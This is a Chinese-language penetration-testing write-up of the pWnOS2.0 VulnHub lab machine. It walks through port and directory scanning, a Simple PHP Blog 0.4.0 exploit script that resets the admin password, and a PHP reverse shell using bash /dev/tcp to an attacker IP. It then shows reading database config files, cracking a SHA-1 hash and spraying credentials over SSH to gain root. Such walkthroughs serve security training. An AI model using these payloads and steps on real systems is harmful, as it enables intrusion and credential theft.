pWnOS2.0 靶机渗透( cms 渗透,php+mysql 网站渗透,密码碰撞)

pWnOS2.0 靶机渗透( )

靶机介绍

vulnhub 靶机

本地搭建

由于靶机特性,靶机网卡位nat模式扫不到,原来需要改 nat 的地址

参考方法
https://blog.csdn.net/Bossfrank/article/details/131415257
作者主页
https://blog.csdn.net/Bossfrank?type=blog
PS: 国科大硕士老哥很牛,非常牛,学习了 🙏

nmap 信息收集

┌──(kali㉿kali)-[~]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             20:37:33 [0/3]
└─$ sudo nmap -sn 10.10.10.0/24                                                                                                                                                                                                                                                                                                                           
[sudo] password for kali:                                                                            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:37 CST                                                                                                                                        
Nmap scan report for localhost (10.10.10.1)                                                                                                                                                                                                                                                                    
Host is up (0.00035s latency).                                                                       
MAC Address: 00:50:56:C0:00:08 (VMware)                                                              
Nmap scan report for bogon (10.10.10.2)                                                              
Host is up (0.00010s latency).                                                                       
MAC Address: 00:50:56:F3:32:0E (VMware)                                                              
Nmap scan report for bogon (10.10.10.100)                                                                                                                                                                 
Host is up (0.00019s latency).                                                                                                                                                                            
MAC Address: 00:0C:29:8D:63:FF (VMware)                                                                                                                                                                   
Nmap scan report for localhost (10.10.10.128)                                                                                                                                                             
Host is up (0.00012s latency).                                                                                                                                                                                                                                                                                 
MAC Address: 00:0C:29:83:4F:85 (VMware)                                                              
Nmap scan report for bogon (10.10.10.254)                                                            
Host is up (0.000068s latency).                                                                      
MAC Address: 00:50:56:EB:94:F3 (VMware)                                                              
Nmap scan report for localhost (10.10.10.129)                                                        
Host is up.                                                                                          
Nmap done: 256 IP addresses (6 hosts up) scanned in 1.92 seconds                                     ┌──(kali㉿kali)-[~]                                                                                  
└─$ sudo nmap --min-rate 10000 -p- 10.10.10.100                                                                                                                                                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:39 CST                                                                                                                                        
Nmap scan report for bogon (10.10.10.100)                                                            
Host is up (0.000045s latency).                                                                      
Not shown: 65533 closed tcp ports (reset)                                                            
PORT   STATE SERVICE                                                                                 
22/tcp open  ssh                                                                                     
80/tcp open  http                                                                                    
MAC Address: 00:0C:29:8D:63:FF (VMware)                                                              Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds                                                                                                                                               ┌──(kali㉿kali)-[~]                                                                                                                                                                                                                                                                                            
└─$ sudo nmap -sT -sV -O -p22,80 10.10.10.100                                                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:40 CST                                   
Nmap scan report for bogon (10.10.10.100)                                                            
Host is up (0.00037s latency).                                                                       PORT   STATE SERVICE VERSION                                                                         
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)                                                                                                                           
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))                                                  
MAC Address: 00:0C:29:8D:63:FF (VMware)                                                                                                                                                                   
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port                                                                                                                                                                                                          
Device type: general purpose                                                                         
Running: Linux 2.6.X                                                                                 
OS CPE: cpe:/o:linux:linux_kernel:2.6                                                                
OS details: Linux 2.6.32 - 2.6.39                                                                    
Network Distance: 1 hop                                                                                                                                
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                              OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                                                                                                                          
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds                                                                                                                                               ┌──(kali㉿kali)-[~]                                                                                                                                    
└─$ sudo nmap --script=vuln -p22,80 10.10.10.100                                                                                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:40 CST                                                                                     
Stats: 0:01:35 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan                                                                             
NSE Timing: About 91.09% done; ETC: 20:42 (0:00:08 remaining)                                                                                          
Stats: 0:02:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan                                                                             
NSE Timing: About 93.56% done; ETC: 20:44 (0:00:11 remaining)                                                                                          
Nmap scan report for bogon (10.10.10.100)                                                                                                              
Host is up (0.00034s latency).                                                                                                                         PORT   STATE SERVICE                                                                                                                                   
22/tcp open  ssh                                                                                                                                       
80/tcp open  http                                                                                                                                      
|_http-csrf: Couldn't find any CSRF vulnerabilities.                                                                                                   
|_http-dombased-xss: Couldn't find any DOM based XSS.                                                                                                  
| http-slowloris-check:                                                                                                                                
|   VULNERABLE:                                                                                                                                        
|   Slowloris DOS attack                                                                                                                               
|     State: LIKELY VULNERABLE                                                                                                                         
|     IDs:  CVE:CVE-2007-6750                                                                                                                          
|       Slowloris tries to keep many connections to the target web server open and hold                                                                                                                                                                                                                        
|       them open as long as possible.  It accomplishes this by opening connections to                                                                                                                                                                                                                         
|       the target web server and sending a partial request. By doing so, it starves                                                                   
|       the http server's resources causing Denial Of Service.                                                                                         
|                                                                                                                                                      
|     Disclosure date: 2009-09-17                                                                                                                      
|     References:                                                                                                                                      
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750                                                                                   
|_      http://ha.ckers.org/slowloris/                                                                                                                 
| http-cookie-flags:                                                                                                                                   
|   /:                                                                                                                                                 
|     PHPSESSID:                                                                                                                                       
|_      httponly flag not set                                                                                                                          
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)                                                                          
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                                                                       
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)                                                                                   
MAC Address: 00:0C:29:8D:63:FF (VMware)                                                                                                                Nmap done: 1 IP address (1 host up) scanned in 395.77 seconds  

web 渗透

“欢迎来到这个网站,如果你有任何问题请发邮件给 admin@isints.com”
在这里插入图片描述
爆破目录

                                                                                                                                                                                                                                                                                                               
┌──(kali㉿kali)-[~]                                                                                  
└─$ sudo dirb http://10.10.10.100                                                                                                                                                                                                                                                                              
[sudo] password for kali:                                                                                                                                                                                 -----------------                                                                                    
DIRB v2.22                                                                                                                                                                                                                                                                                                     
By The Dark Raver                                                                                                                                                                                         
-----------------                                                                                    START_TIME: Sun Sep 29 23:08:26 2024                                                                                                                                                                                                                                                                           
URL_BASE: http://10.10.10.100/                                                                                                                                                                            
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt                                                 -----------------                                                                                                                                                                                                                                                                                              GENERATED WORDS: 4612                                                                                ---- Scanning URL: http://10.10.10.100/ ----                                                                                                                                                                                                                                                                   
+ http://10.10.10.100/activate (CODE:302|SIZE:0)                                                                                                                                                          
==> DIRECTORY: http://10.10.10.100/blog/                                                                                                                                                                                                                                                                       
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)                                                                                                                                                                                                                                                             
==> DIRECTORY: http://10.10.10.100/includes/                                                                                                                                                                                                                                                                   
+ http://10.10.10.100/index (CODE:200|SIZE:854)                                                                                                                                                           
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)                                                                                                                                                                                                                                                            
+ http://10.10.10.100/info (CODE:200|SIZE:50175)                                                                                                                                                                                                                                                               
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)                                                                                                                                                                                                                                                           
+ http://10.10.10.100/login (CODE:200|SIZE:1174)                                                                                                                                                                                                                                                               
+ http://10.10.10.100/register (CODE:200|SIZE:1562)                                                                                                                                                                                                                                                            
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)                                                                                                                                                                                                                                                        ---- Entering directory: http://10.10.10.100/blog/ ----                                                                                                
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)                                                                                                                                                                                                                                                               
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)                                                                                                                                                      
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)                                                                                                                                                                                                                                                        
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)                                                                                                                                                                                                                                                          
==> DIRECTORY: http://10.10.10.100/blog/config/                                                                                                                                                                                                                                                                
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:6001)                                                                                                                                                                                                                                                        
==> DIRECTORY: http://10.10.10.100/blog/content/                                                                                                                                                                                                                                                               
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)                                                                                                                                                                                                                                                            
==> DIRECTORY: http://10.10.10.100/blog/docs/                                                                                                                                                                                                                                                                  
==> DIRECTORY: http://10.10.10.100/blog/flash/                                                                                                                                                                                                                                                                 
==> DIRECTORY: http://10.10.10.100/blog/images/                                                                                                                                                                                                                                                                
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8094)                                                                                                                                                                                                                                                          
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)                                                                                                                                                                                                                                                      
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)                                                                                                                                                                                                                                                              
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)                                                                                                                                                                                                                                                          
==> DIRECTORY: http://10.10.10.100/blog/interface/                                                                                                                                                                                                                                                             
==> DIRECTORY: http://10.10.10.100/blog/languages/                                                                                                                                                                                                                                                             
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5750)                                                                                                                                                                                                                                                          
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)                                                                                                                                                                                                                                                            
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)                                                                                                                                                                                                                                                           
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)                                                                                                                                                                                                                                                            
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)                                                                                                                                                                                                                                                            
==> DIRECTORY: http://10.10.10.100/blog/scripts/                                                                                                                                                                                                                                                               
+ http://10.10.10.100/blog/search (CODE:200|SIZE:5034)                                                                                                                                                                                                                                                         
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)                                                                                                                                                                                                                                                             
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)                                                                                                                                                                                                                                                            
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5392)                                                                                                                                                                                                                                                          
==> DIRECTORY: http://10.10.10.100/blog/themes/                                                                                                                                                                                                                                                                
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)                                                                                                                                                                                                                                                         
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)                                                                                                                                                                                                                                                           ---- Entering directory: http://10.10.10.100/includes/ ----                                                                                            
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                (Use mode '-w' if you want to scan it anyway)                                                                                                      ---- Entering directory: http://10.10.10.100/blog/config/ ----                                                                                         
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                (Use mode '-w' if you want to scan it anyway)                                                                                                      ---- Entering directory: http://10.10.10.100/blog/content/ ----                                                                                        
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                (Use mode '-w' if you want to scan it anyway)                                                                                                      ---- Entering directory: http://10.10.10.100/blog/docs/ ----                                                                                           
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                (Use mode '-w' if you want to scan it anyway)                                                                                                      ---- Entering directory: http://10.10.10.100/blog/flash/ ----                                                                                          
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                (Use mode '-w' if you want to scan it anyway)                                                                                                      ---- Entering directory: http://10.10.10.100/blog/images/ ----                                                                                         
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                (Use mode '-w' if you want to scan it anyway)                                                                                                      ---- Entering directory: http://10.10.10.100/blog/interface/ ----                                                                                      
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                (Use mode '-w' if you want to scan it anyway)                                                                                                      ---- Entering directory: http://10.10.10.100/blog/languages/ ----                                                                                      
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                (Use mode '-w' if you want to scan it anyway)                                                                                                      ---- Entering directory: http://10.10.10.100/blog/scripts/ ----                                                                                        
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                (Use mode '-w' if you want to scan it anyway)                                                                                                      ---- Entering directory: http://10.10.10.100/blog/themes/ ----                                                                                         
(!) WARNING: Directory IS LISTABLE. No need to scan it.                                                                                                (Use mode '-w' if you want to scan it anyway)                                                                                                      -----------------                                                                                                                                      
END_TIME: Sun Sep 29 23:08:34 2024                                                                                                                     
DOWNLOADED: 9224 - FOUND: 30       

注入一下 login.php 试一试
’ or 1=1 – 或者 ’ or 1=1 #
搞笑,爆源码了
在这里插入图片描述

把爆出来的目录 grep 出 200 的页
推测这是一个内容管理系统,找找 cms 的名称
在位置
view-source:http://10.10.10.100/blog/index.php
找到 Simple PHP Blog 0.4.0
在这里插入图片描述
漏洞库找一找

┌──(kali㉿kali)-[~/testPwnos2.0]                                                                                                                                                             20:49:59 [0/3]
└─$ sudo searchsploit simple php blog 0.4.0
[sudo] password for kali: 
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                         | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities                                                                                    | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities                                                                             | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s                                                                                                                                | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                                                                                                            | php/webapps/16883.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ searchsploit simple php blog -m 1191   
[!] Could not find EDB-ID #[!] Could not find EDB-ID #[!] Could not find EDB-ID #Exploit: Simple PHP Blog 0.4.0 - Multiple Remote sURL: https://www.exploit-db.com/exploits/1191Path: /usr/share/exploitdb/exploits/php/webapps/1191.plCodes: OSVDB-19070, CVE-2005-2787, OSVDB-19012, CVE-2005-2733, OSVDB-17779, CVE-2005-2192Verified: True
File Type: Perl script text executable
Copied to: /home/kali/testPwnos2.0/1191.pl┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ ls
1191.pl  dir.ori
sudo apt-get install libswitch-perl
________________________________________________________________________________                                                 SimplePHPBlog v0.4.0 Exploits                                                                                  by                                                                                                  Kenneth F. Belva, CISSP                                                                                     http://www.ftusecurity.com                                                                                                                                                                                                                      
________________________________________________________________________________                                                 Program : 1191.pl                                                                                                                                                                                                                                                                                                   Version : v0.1                                                                                                           Date    : 8/25/2005                                                                                                      Descript: This perl script demonstrates a few flaws in                                                                                                                                                                                                                                                              SimplePHPBlog.                                                                                                                                                  Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...                                                                   DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO                                                                                                                                                                                                                                                                                                   NOT HAVE PERMISSION TO DO SO!                 Please see this script comments for solution/fixes                                                                                          to demonstrated vulnerabilities.                                                                                                            http://www.simplephpblog.com                                                                                                                Usage   : 1191.pl [-h host] [-e exploit]                                                                                                              -?      : this menu                                                                                                                           -h      : host                                                                                                                                -e      : exploit                                                        (1)     : Upload cmd.php in [site]/images/                                                                                                                (2)     : Retreive Password file (hash)                                                                                               (3)     : Set New User Name and Password                                                                                              [NOTE - uppercase switches for exploits]                                                                                      -U      : user name                                                                                                                               -P      : password                                                                                                                                                                                                                                                                          (4)     : Delete a System File                                                                                                                            -F      : Path and System File                                                                                                                    Examples: 1191.pl -h 127.0.0.1 -e 2                                              1191.pl -h 127.0.0.1 -e 3 -U l33t -P l33t                                                                                                                       1191.pl -h 127.0.0.1 -e 4 -F ./index.php                                                                                                                        1191.pl -h 127.0.0.1 -e 4 -F ../../../etc/passwd                                                                                                                1191.pl -h 127.0.0.1 -e 1   
┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo perl 1191.pl -h http://10.10.10.100/blog -e 3 -U hugomc -P hugomc
________________________________________________________________________________SimplePHPBlog v0.4.0 ExploitsbyKenneth F. Belva, CISSPhttp://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: hugomc
Password is set to: hugomc*** Exploit Completed....
Have a nice day! :)

在这里插入图片描述

传 shell ,拿下初级 shell

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ cat shell.php          
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.129/1234 0>&1'"); ?>

把这个 shell 传上去

结合目录爆破,推测 shell 位置应该在 http://10.10.10.100/blog/images/shell.php ,监听,访问,即可得到 shell

拿到初始 shell

┌──(kali㉿kali)-[~/testPwnos2.0]                                                                                                                                                                     [0/41]
└─$ sudo ncat -lvnp 1234                         
[sudo] password for kali:  
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.100:34941.
bash: no job control in this shell
www-data@web:/var/www/blog/images$ 

尝试提权

┌──(kali㉿kali)-[~/testPwnos2.0]                                                                                                                                                                     [0/41]
└─$ sudo ncat -lvnp 1234                        
[sudo] password for kali: 
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.100:34941.
bash: no job control in this shell
www-data@web:/var/www/blog/images$ www-data@web:/var/www/blog/images$ whoami
whoami
www-data
www-data@web:/var/www/blog/images$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host loinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000link/ether 00:0c:29:8d:63:ff brd ff:ff:ff:ff:ff:ffinet 10.10.10.100/24 brd 10.10.10.255 scope global eth0inet6 fe80::20c:29ff:fe8d:63ff/64 scope link valid_lft forever preferred_lft forever
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@web:/var/www/blog/images$ uname -a
uname -a
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
www-data@web:/var/www/blog/images$ python --version
python --version
Python 2.7.1+
www-data@web:/var/www/blog/images$ 

使用 python 升级交互性

www-data@web:/var/www/blog/images$ python -c "import pty;pty.spawn('/bin/bash')"
<images$ python -c "import pty;pty.spawn('/bin/bash')"  

找一找敏感文件泄露

www-data@web:/var/www/blog/images$ pwd
pwd
/var/www/blog/images
www-data@web:/var/www/blog/images$ cd ..
cd ..
www-data@web:/var/www/blog$ ls
ls
add.php                 flash                   rate_cgi.php
add_block.php           image_list.php          rdf.php
add_cgi.php             images                  recompress.php
add_link.php            index.php               rss.php
add_static.php          info.php                scripts
add_static_cgi.php      install00.php           search.php
atom.php                install01.php           set_login.php
categories.php          install02.php           set_login_cgi.php
colors.php              install03.php           setup.php
colors_cgi.php          install03_cgi.php       setup_cgi.php
comment_add_cgi.php     interface               static.php
comment_delete_cgi.php  languages               stats.php
comments.php            languages.php           themes
config                  languages_cgi.php       themes.php
contact.php             login.php               trackback.php
contact_cgi.php         login_cgi.php           trackback_delete_cgi.php
content                 logout.php              upgrade.php
delete.php              options.php             upload_img.php
delete_static.php       options_cgi.php         upload_img_cgi.php
docs                    preview_cgi.php         upload_img_new.php
downgrade.php           preview_static_cgi.php
www-data@web:/var/www/blog$ cd ..
cd ..
www-data@web:/var/www$ ls
ls
activate.php  includes   info.php   mysqli_connect.php
blog          index.php  login.php  register.php

似乎找到了

www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.// Set the database access information as constants:DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');// Make the connection:$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );?>www-data@web:/var/www$ 

没法登录,还有其他的配置文件吗?

www-data@web:/var/www$ mysql -uroot -pgoodday
mysql -uroot -pgoodday
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)

是的,其他位置的数据库连接配置文件有不同的内容

www-data@web:/var/www$ find / -name mysqli_connect.php 2>/dev/null
find / -name mysqli_connect.php 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php
www-data@web:/var/www$ cat /var/mysqli_connect.php
cat /var/mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.// Set the database access information as constants:DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');// Make the connection:$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );?>www-data@web:/var/www$ 

成功登录mysql

www-data@web:/var/www$ mysql -uroot -proot@ISIntS
mysql -uroot -proot@ISIntS
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 36
Server version: 5.1.54-1ubuntu4 (Ubuntu)Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 licenseType 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> 

看一看数据库的内容

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ch16               |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)mysql> use ch16                                                                 
use ch16
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users          |
+----------------+
1 row in set (0.00 sec)

看一看用户表

mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email            | pass                                     | user_level | active | registration_date   |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
|       1 | Dan        | Privett   | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |          0 | NULL   | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)

密码的加密方式识别位 sha-1

┌──(kali㉿kali)-[~/testPwnos2.0]                                                                                                                                                                           
└─$ hash-identifier c2c4b4e51d9e23c02c15702c136c3e950ba9a4af                                                                                                                                               #########################################################################                                                                                                                               #     __  __                     __           ______    _____           #                                                                                                                               #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         ##    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        ##     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       ##      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      ##       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      ##        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 ##                                                             By Zion3R ##                                                    www.Blackploit.com ##                                                   Root@Blackploit.com ##########################################################################
-------------------------------------------------- Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

拿到密码哈希,尝试解密 sha-1
在这里插入图片描述密码为

c2c4b4e51d9e23c02c15702c136c3e950ba9a4af:killerbeesareflying

看一看 passwd 确定用户名

www-data@web:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:0:0:MySQL Server,,,:/root:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:104:110::/var/lib/landscape:/bin/false 
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash

密码碰撞

尝试密码碰撞,进ssh
可能的用户名

administrator
admin
dan
root
hugomc

可能的密码

killerbeesareflying
root@ISIntS
hugomc

使用 crackmapexec ,找到账号密码

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo crackmapexec ssh 10.10.10.100 -p passwords.lst -u users.lst --continue-on-success           
SSH         10.10.10.100    22     10.10.10.100     [*] SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3
SSH         10.10.10.100    22     10.10.10.100     [-] administrator:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] administrator:root@ISIntS Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] administrator:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] admin:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] admin:root@ISIntS Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] admin:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] dan:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] dan:root@ISIntS Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] dan:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] root:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [+] root:root@ISIntS (Pwn3d!)
SSH         10.10.10.100    22     10.10.10.100     [-] root:hugomc Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] hugomc:killerbeesareflying Authentication failed.
SSH         10.10.10.100    22     10.10.10.100     [-] hugomc:root@ISIntS Authentication failed.                                                                                                          
SSH         10.10.10.100    22     10.10.10.100     [-] hugomc:hugomc Authentication failed.     

拿下

┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo ssh root@10.10.10.100                                                                                                                                                     
The authenticity of host '10.10.10.100 (10.10.10.100)' can't be established.
ECDSA key fingerprint is SHA256:EWPtTr0Xn9NMudUhcD3+AMXSigXAGS4uldZp3grLm8w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.100' (ECDSA) to the list of known hosts.
root@10.10.10.100's password: 
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)* Documentation:  http://www.ubuntu.com/server/docSystem information as of Fri Aug  9 18:44:09 EDT 2024System load:  0.0               Processes:           77Usage of /:   2.9% of 38.64GB   Users logged in:     0Memory usage: 18%               IP address for eth0: 10.10.10.100Swap usage:   0%Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May  9 19:29:03 2011
root@web:~# whoami
root
root@web:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host loinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000link/ether 00:0c:29:8d:63:ff brd ff:ff:ff:ff:ff:ffinet 10.10.10.100/24 brd 10.10.10.255 scope global eth0inet6 fe80::20c:29ff:fe8d:63ff/64 scope link valid_lft forever preferred_lft forever

看一看权限

root@web:~# sudo -l
Matching Defaults entries for root on this host:env_resetUser root may run the following commands on this host:(ALL : ALL) ALL

总结

nmap 扫描,发现靶机开放了 22, 80 端口
访问 80,结合目录爆破,发现 /blog 目录中运行了一个 cms 系统
观察发现 cms 的名称和版本,是 simple php blog 0.4.0 ,尝试在 searchsploit 中找利用脚本
发现利用脚本,使用脚本在 cms 中创建新账号,并成功登录
发现后台的上传图片,验证可以上传 .php 文件后构造反弹 shell,成功拿到 shell
拿到初始 shell 后,做信息收集。发现两个数据库连接文件,其中一个是目前 cms 正在使用的。尝试账号密码,成功登录数据库,发现数据库内有一个sha-1加密的密码,可破解
作密码碰撞,成功使用 ssh 登录。原来是 cms 系统部署者的 Linux 系统 root 用户密码使用了 mysql 数据库 root 用户的密码 😓

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/440901.html

